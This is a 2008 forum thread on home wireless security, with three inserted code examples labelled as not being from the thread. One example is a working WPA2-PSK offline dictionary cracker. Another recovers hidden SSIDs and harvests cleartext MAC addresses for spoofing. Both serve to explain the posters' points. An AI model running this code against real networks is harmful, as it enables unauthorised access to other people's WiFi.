DaemonForums  

Post by Oko, 18th November 2008

Originally posted by JMJ_coder:
That is the security I have implemented so far. I'm asking how secure (or insecure - I hope not ) that is and what else I can do to make it really secure?
man VPN and IPsec

Post by JMJ_coder, 18th November 2008

Originally posted by Oko:
man VPN and IPSEC
O.K. - I found IPSEC and will read up on it. I couldn't find VPN - I saw OpenVPN (openvpn.net) in pkgsrc; is that what you are referring to?

Also, will this work with the gateway (AT&T 2701HG-B) that also needs to communicate via wired to the tower that is currently running Slackware and the laptop when I feel like plugging it in? The gateway is the access point, not the laptop - and the gateway doesn't have too many options (it's a consumer DSL) - I just wonder if the gateway can handle this.
__________________
And the WORD was made flesh, and dwelt among us. (John 1:14)
Post by Oko, 18th November 2008

Originally posted by JMJ_coder:
O.K. - I found IPSEC and will read up on it. I couldn't find VPN - I saw OpenVPN (openvpn.net) in pkgsrc; is that what you are referring to?

Also, will this work with the gateway (AT&T 2701HG-B) that also needs to communicate via wired to the tower that is currently running Slackware and the laptop when I feel like plugging it in? The gateway is the access point, not the laptop - and the gateway doesn't have too many options (it's a consumer DSL) - I just wonder if the gateway can handle this.
OpenVPN is one of many different implementations of a Virtual Private Network (VPN). It is very popular among Linux users. You do not want that one. It is a very poor implementation which violates many RFCs. You want IPsec.

Cheers,
OKO

Post by J65nko (Administrator), 18th November 2008

Or have a look at authpf http://netbsd.gw.com/cgi-bin/man-cgi?authpf++NetBSD-4.0
__________________
You don't need to be a genius to debug a pf.conf firewall ruleset, you just need the guts to run tcpdump
Post by s2scott, 18th November 2008

Originally posted by Oko:
OpenVPN ... you do not want that one. It is very poor implementation which violates many RFC. Cheers, OKO
Pardon?
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Post by Alphalutra1, 19th November 2008

Originally posted by JMJ_coder:
... I'm asking how secure (or insecure - I hope not ) that is and what else I can do to make it really secure?
Since you have secured the network with WPA2, disabling the SSID broadcast and MAC address filters are merely annoyances for you if you ever want to add more computers. "Disabling" the SSID broadcast does not disable all the signals it sends out, so people can still see your network (many wireless cracking programs find it automagically). MAC addresses are always sent "in the clear", which means there is no encryption, so anyone who can get even one packet off your wireless communications between yourself and the router will know your MAC address and be able to clone it.

That being said, WPA2, at least right now, is only able to be cracked through brute force, so if you have a very strong key, I would say you are good to go. Of course, if you like experimenting, setting up OpenBSD with authpf and IPsec is always a fun weekend project for an alternative method of securing your router....

Cheers,

Alphalutra1
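Added example, not part of Alphalutra1's post or anything else on this page: a small parser for 802.11 management frames, run over a constructed capture, to make the two points above concrete. The transmitter MAC sits in the unencrypted 24-byte frame header whether or not the privacy (WEP/WPA/WPA2) capability bit is set, and an AP whose beacons carry an empty or NUL-filled SSID element still names the network in the probe response it sends when a client asks for it by name. The addresses, the SSID "homenet" and every frame byte below are made up; the frame layout (header, fixed fields, tag/length/value elements) is the standard one, and radiotap headers and the FCS are left out.

```python
# Added example (not from the thread): a minimal 802.11 management-frame parser
# run over a constructed capture.  It shows that transmitter MACs are readable
# whatever the privacy bit says, and that a "hidden" SSID is still sent in the
# probe response the AP gives a client that asks for the network by name.
import struct
from dataclasses import dataclass
from typing import Optional

MGMT_SUBTYPES = {0x0: "assoc-req", 0x4: "probe-req", 0x5: "probe-resp", 0x8: "beacon"}
IE_SSID, IE_RATES = 0, 1
CAP_PRIVACY = 0x0010            # capability bit 4: WEP/WPA/WPA2 in use

@dataclass
class MgmtFrame:
    subtype: str
    src: str                    # Addr2, the transmitter; never encrypted
    bssid: str                  # Addr3
    privacy: Optional[bool]     # only beacons / probe responses carry it
    ssid: Optional[bytes]       # SSID element if present

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_ies(body: bytes) -> dict:
    """Tag/length/value elements that follow the fixed fields."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies

def parse_mgmt(frame: bytes) -> MgmtFrame:
    fc0, _flags, _dur, _a1, a2, a3, _seq = struct.unpack_from("<BBH6s6s6sH", frame, 0)
    if (fc0 >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    subtype = MGMT_SUBTYPES.get(fc0 >> 4, f"subtype-{fc0 >> 4}")
    body, privacy = frame[24:], None
    if subtype in ("beacon", "probe-resp"):            # timestamp, interval, capability
        _ts, _interval, capab = struct.unpack_from("<QHH", body, 0)
        privacy, body = bool(capab & CAP_PRIVACY), body[12:]
    elif subtype == "assoc-req":                       # capability, listen interval
        body = body[4:]
    return MgmtFrame(subtype, mac(a2), mac(a3), privacy, parse_ies(body).get(IE_SSID))

def ssid_is_hidden(f: MgmtFrame) -> bool:
    """'Hidden' APs beacon a zero-length or NUL-filled SSID element."""
    return f.ssid is not None and f.ssid.strip(b"\x00") == b""

def recover_hidden_ssids(frames) -> dict:
    """BSSID -> SSID for every hidden AP that later named itself in a probe
    response or was named in an association request."""
    parsed = [parse_mgmt(x) for x in frames]
    hidden = {f.bssid for f in parsed if f.subtype == "beacon" and ssid_is_hidden(f)}
    return {f.bssid: f.ssid for f in parsed
            if f.subtype in ("probe-resp", "assoc-req")
            and f.bssid in hidden and not ssid_is_hidden(f)}

def observed_macs(frames) -> set:
    """Every transmitter address on the air: all a MAC-filter clone needs."""
    return {parse_mgmt(x).src for x in frames}

# --- constructed sample capture (addresses, SSID and bytes are made up) ---
def build_mgmt(subtype: int, src: bytes, bssid: bytes, fixed: bytes, ies) -> bytes:
    hdr = struct.pack("<BBH6s6s6sH", subtype << 4, 0, 0, b"\xff" * 6, src, bssid, 0)
    return hdr + fixed + b"".join(struct.pack("BB", t, len(v)) + v for t, v in ies)

AP, CLIENT, SSID = b"\x02\x1b\x77\x01\x02\x03", b"\x02\x11\x22\x33\x44\x55", b"homenet"
RATES = b"\x82\x84\x8b\x96"
AP_FIXED = struct.pack("<QHH", 0, 100, 0x0001 | CAP_PRIVACY)     # ESS + privacy set

SAMPLE_FRAMES = [
    build_mgmt(0x8, AP, AP, AP_FIXED, [(IE_SSID, b""), (IE_RATES, RATES)]),           # hidden beacon
    build_mgmt(0x8, AP, AP, AP_FIXED, [(IE_SSID, b"\x00" * 7), (IE_RATES, RATES)]),   # NUL-padded variant
    build_mgmt(0x4, CLIENT, b"\xff" * 6, b"", [(IE_SSID, SSID), (IE_RATES, RATES)]),  # client asks by name
    build_mgmt(0x5, AP, AP, AP_FIXED, [(IE_SSID, SSID), (IE_RATES, RATES)]),          # AP answers with it
]

if __name__ == "__main__":
    for fr in SAMPLE_FRAMES:
        print(parse_mgmt(fr))
    print("recovered:", recover_hidden_ssids(SAMPLE_FRAMES))
    print("cleartext MACs:", sorted(observed_macs(SAMPLE_FRAMES)))
```

Both beacons parse as hidden with the privacy bit set, yet the probe response ties the BSSID to "homenet", and the client's MAC is in observed_macs() without touching any encrypted payload.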
Post by Oliver_H (Oliver Herold), 19th November 2008

Points 2 and 6 are nonsense, myths of the net. WPA2 is good, but if possible use a VPN.
__________________
use UNIX or die :-)
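Alphalutra1's point above, that WPA2-PSK falls only to guessing the key, as an added example that is not from the thread. The client derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), expands it into the PTK with the two MAC addresses and the two nonces, and the first 16 bytes of the PTK (the KCK) sign message 2 of the 4-way handshake. All of those inputs cross the air in the clear, so an eavesdropper can test passphrases offline at the cost of one PBKDF2 run each. The handshake below is built in-script from known passphrases rather than captured; make_handshake(), crack(), the MACs, nonces and the wordlist are this example's own inventions.

```python
# Added example (not from the thread): why a WPA2-PSK network is only as strong
# as its passphrase.  SSID, both MACs, both nonces and message 2 with its MIC
# are all visible to an eavesdropper; the handshake here is constructed.
import hashlib
import hmac
import struct
from typing import Optional

def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11i PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                 length: int = 48) -> bytes:
    """PRF-384 from 802.11i: HMAC-SHA1 over label || 0x00 || data || counter."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
        i += 1
    return out[:length]          # KCK = [0:16], KEK = [16:32], TK = [32:48]

MIC_OFF = 81                     # EAPOL-Key MIC field offset inside the 802.1X frame

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP key-descriptor MIC: HMAC-SHA1 over the frame with MIC zeroed, 128 bits."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2: RSN descriptor, KeyInfo = MIC|Pairwise|version 2."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 0, 1) + snonce     # desc, key info, key len, replay ctr
            + b"\x00" * 32 + mic + struct.pack(">H", 0))        # IV, RSC, ID, MIC, key data len
    return struct.pack(">BBH", 1, 3, len(body)) + body           # 802.1X: version, EAPOL-Key, length

def make_handshake(passphrase: str, ssid: bytes) -> dict:
    """Constructed 'capture': what an eavesdropper holds after a real join."""
    ap, sta = b"\x02\x1b\x77\x01\x02\x03", b"\x02\x11\x22\x33\x44\x55"
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))
    return {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce, "msg2": msg2}

def mic_for(passphrase: str, hs: dict) -> bytes:
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    kck = ptk_from_pmk(pmk, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
    return eapol_mic(kck, hs["msg2"])

def crack(hs: dict, candidates) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 (4096 rounds) plus one PRF per guess."""
    target = hs["msg2"][MIC_OFF:MIC_OFF + 16]
    for cand in candidates:
        if hmac.compare_digest(mic_for(cand, hs), target):
            return cand
    return None

WORDLIST = ["letmein", "password123", "homenet2008"]   # constructed

if __name__ == "__main__":
    weak = make_handshake("password123", b"homenet")
    strong = make_handshake("Rk9#vT2m!qZp7Lw4Xc", b"homenet")
    print("weak key   ->", crack(weak, WORDLIST))
    print("strong key ->", crack(strong, WORDLIST))
```

Nothing in the protocol distinguishes a right guess from a wrong one except the MIC match, so the only lever the network owner has is the passphrase's entropy; the SSID salt merely stops one precomputed table from covering every network.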
Post by s2scott, 19th November 2008

Originally posted by Alphalutra1:
...Of course, if you like experimenting, setting up OpenBSD with ...
I guard my WiFi using ssh with the "-w" option and disable WEP/WPA altogether (yields better throughput and superior security). See my old post @ http://www.daemonforums.org/showthread.php?t=141

While IPSec is the gold standard, it's tricky and the ssh is/was a lot easier (for our context).

/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Post by Alphalutra1, 19th November 2008

Originally posted by s2scott:
I guard my WiFi using ssh with the "-w" option and disable WEP/WPA altogether (yields better throughput and superior security). See my old post @ http://www.daemonforums.org/showthread.php?t=141

While IPSec is the gold standard, it's tricky and the ssh is/was a lot easier (for our context).

/S
Wow, that's awesome! I think I'm up for trying that in the coming weekends, with Thanksgiving and all. Thanks for the tip!

Cheers,

Alphalutra1
Post by JMJ_coder, 20th November 2008

Originally posted by s2scott:
I guard my WiFi using ssh with the "-w" option and disable WEP/WPA altogether (yields better throughput and superior security). See my old post @ http://www.daemonforums.org/showthread.php?t=141

While IPSec is the gold standard, it's tricky and the ssh is/was a lot easier (for our context).

/S
Even if you ssh into the gateway, what's to prevent others from getting in? I might be missing something (and probably more than just one thing), but that seems to secure your connection between your computer and the gateway and not the gateway from outside intruders.
__________________
And the WORD was made flesh, and dwelt among us. (John 1:14)
Post by BSDfan666, 20th November 2008

Originally posted by JMJ_coder:
Even if you ssh into the gateway, what's to prevent others from getting in? I might be missing something (and probably more than just one thing ), but that seems to secure your connection between your computer and the gateway and not the gateway from outside intruders.
A carefully written pf ruleset would prevent wireless users from accessing the rest of your network, and even your gateway.

If all you allow is SSH connectivity, clients would be required to authenticate, so unless they stole your key and passphrase, you should be safe.

Also, in that sort of setup, typically you wouldn't want to use password-only authentication, as it would be brute-forceable.
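For the setup BSDfan666 and s2scott describe (sshd reachable on the wireless interface, ssh -w tunnels as the only way onto the wired side, no password-only logins), here is an added sshd_config check; it is not code from the thread, and s2scott's pf fragment from the old post is not reproduced here. It applies sshd's rule that the first value read for a keyword wins, treats ChallengeResponseAuthentication as the alias of KbdInteractiveAuthentication that it is, and stops at the first Match line on the assumption that everything after it is conditional and outside a global audit. The two embedded configs are constructed, and audit_sshd_config() and its messages are this example's own.

```python
# Added example (not from the thread): audit an sshd_config for the
# "ssh -w tunnel is the only way off the wireless segment" setup.
# Rules applied: keywords are case-insensitive, the first value read for a
# keyword wins, and directives after a Match line are conditional, so the
# global audit stops there (an assumption that keeps the checker simple).
import re

# OpenSSH defaults for the keywords this design depends on.
DEFAULTS = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permittunnel": "no",
}
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}

def parse_sshd_config(text: str) -> dict:
    """Effective global value of every keyword seen before any Match block."""
    seen = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):       # comment or blank line
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = ALIASES.get(parts[0].lower(), parts[0].lower())
        if key == "match":
            break                                  # the rest is conditional
        val = parts[1].strip().lower() if len(parts) > 1 else ""
        seen.setdefault(key, val)                  # first obtained value wins
    return seen

def effective(text: str) -> dict:
    cfg = parse_sshd_config(text)
    return {k: cfg.get(k, d) for k, d in DEFAULTS.items()}

def audit_sshd_config(text: str) -> list:
    """Findings that break or weaken the key-only, tunnel-capable design."""
    e = effective(text)
    findings = []
    if e["permittunnel"] not in ("yes", "point-to-point", "ethernet"):
        findings.append("PermitTunnel is off: the server will refuse ssh -w")
    if e["pubkeyauthentication"] != "yes":
        findings.append("PubkeyAuthentication is off: key-based login impossible")
    if e["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: guessable from the radio side")
    if e["kbdinteractiveauthentication"] == "yes":
        findings.append("keyboard-interactive auth on: password prompts still accepted")
    return findings

# Constructed configs: a stock-looking one and the corrected one.
WEAK_CONFIG = """\
# sshd_config on the wireless gateway (constructed sample)
Port 22
ListenAddress 10.0.0.1
#PermitTunnel no
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Port 22
ListenAddress 10.0.0.1
# what ssh -w needs: a layer-3 tun device
PermitTunnel point-to-point
PubkeyAuthentication yes
PasswordAuthentication no
# alias of KbdInteractiveAuthentication
ChallengeResponseAuthentication no
# ignored by sshd: the first value above wins
PasswordAuthentication yes
Match Address 10.0.0.0/24
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or ["ok"])
```

The duplicated PasswordAuthentication line in the hardened sample is there on purpose: a later "yes" does not override an earlier "no", which is the opposite of how most people expect config files to behave and a common reason an audit by eye goes wrong.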
Post by ai-danno, 21st November 2008

Originally posted by cabal:
Point 2 and 6 are nonsense, myths of the net. WPA2 is good but if possible use VPN.
This is not true; it's just that when employed as the main line of security (without the other steps) you are not actually secure. Think of these two points, when used with the others, as 'shoring up your defenses'.

- SSID broadcast: If the SSID is always being broadcast, then a war-driver will see the network within a short period of time even when there are no clients using it. When the SSID broadcast is turned off, someone has to be using it at the time for a war-driver to see the network.

- MAC filtering: If a client is not using the network and the intruder spoofs the MAC address, then this line of defense is not relevant. But imagine you are using your MAC address when an intruder attempts to spoof yours for their own connection to the gateway; that leads to very funky, broken connections, and can tip off a user that something is amiss. Think of it as a tripwire.

So, to summarize, these steps taken on their own are not a wise path. But looking for the single "Holy Grail" of security isn't, either. Once your single 'ultimate solution' has a chink in its armor, you are almost as insecure as using the above methods on their own. Using as many techniques as are at your disposal, on the other hand, will make things more difficult for an intruder, and can sometimes tip you off that there is even an intruder lurking in the first place.
__________________
Network Firefighter
Post by s2scott, 21st November 2008

Originally posted by JMJ_coder:
Even if you ssh into the gateway, what's to prevent others from getting in? I might be missing something (and probably more than just one thing)
If you look at the pf.conf fragment in the old post, it allows ssh traffic only on the wifi interface.

It's encrypted and authenticated traffic only.

/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.

Post by s2scott, 21st November 2008

Originally posted by BSDfan666:
If all you allow is SSH connectivity, clients would be required to authenticate, so unless they stole your key and passphrase, you should be safe.
Bingo.

Originally posted by BSDfan666:
Also, in that sort of setup, typically you wouldn't want to use password-only authentication, as it would be brute-forceable.
Key & passphrase only.

Double bingo!


/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Post by richardpl, 21st November 2008

Originally posted by ai-danno:
- SSID Broadcast: If the SSID is always being broadcast then a war-driver will see the network within a short period of time even when there are no clients using it. When the SSID broadcast is turned off, someone has to be using it at the time for a war driver to see the network.
Also think of it as security through obscurity; that is all hiding the SSID is useful for. It can also increase latency, but that is not important in the OP's case.

Compared with wired, wireless networks are not very safe/useful under DoS attacks. And nothing can help you in this situation, except investing some money in your home decoration.
Post by Oko, 21st November 2008

Originally posted by richardpl:
Also think of it like security through obscurity, that is all what hiding SSID is useful for.
Purger,

At least M$ got that one right. To stay on the same note, I am shopping for an SGI O2 to do my online banking. SGI O2 + OpenBSD, I call that real security through obscurity.

Bye,
OKO
Post by jonarthan12, 17th April 2011

Hi JMJ,
You can protect your home network by using a network access password. Be sure to register all devices on your network, including computers, laptops, media players, and networked storage, if you are using MAC filtering. Also, be sure to enter the MAC addresses correctly, as if you enter the wrong ones you will not be able to connect the computer to the router to change them back and you will need to reset the router. Some routers allow you to save them while they are connected.

thanks!!
Post by nilsgecko, 18th April 2011 (Re: SSL)

Originally posted by ai-danno:
No offense taken, in fact I appreciate the comment. But when you mention your wariness about SSL security, are you referring to a "man-in-the-middle" attack? I think that those are do-able for sure, but I assume a low risk on them. Of course, low-risk is not no-risk, and I have not personally shopped online or done any online banking from a wireless hotspot. Also, the risk for a "man-in-the-middle" is also present on wired network paths, not just wireless, but again, the risk is low, and depends on the target website's implementation of SSL.

More to the point, I think that unless the site you are going to with sensitive information has properly implemented SSL (is completely SSL'd throughout the site and not just on authentication) then you shouldn't be visiting that site with sensitive information in the first place.

But if you are referring to something else... let me know. But my assumptions about SSL are that since it's encrypted traffic, and barring any insecure implementations of SSL, it's a secure way to communicate (aside from outlandish uber-hacker gangs and rogue governments... but if that's a realistic fear I wouldn't get online in the first place).

Here's a fun article about cracking SSL itself. I believe this refers to USA-export encryption, not domestic (which is stronger.) Here's another. This one is a more technical paper that describes the toughness of SSL.

I don't see where SSL would be considered insecure if properly implemented. The biggest issue I would think is that it only authenticates from the server side, and doesn't authenticate the client. In other words, someone who can gain access to your credentials (say online banking passwords etc.) can 'authenticate' from anywhere since the session establishment is only one-way.

Also, as evidenced by the recent Comodo partner-hack, it can take some time before a Certificate Authority finds out that a certificate has been issued by the wrong hands....

SSL only works for TCP too, not UDP, which as I understand it, things like VoIP use.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick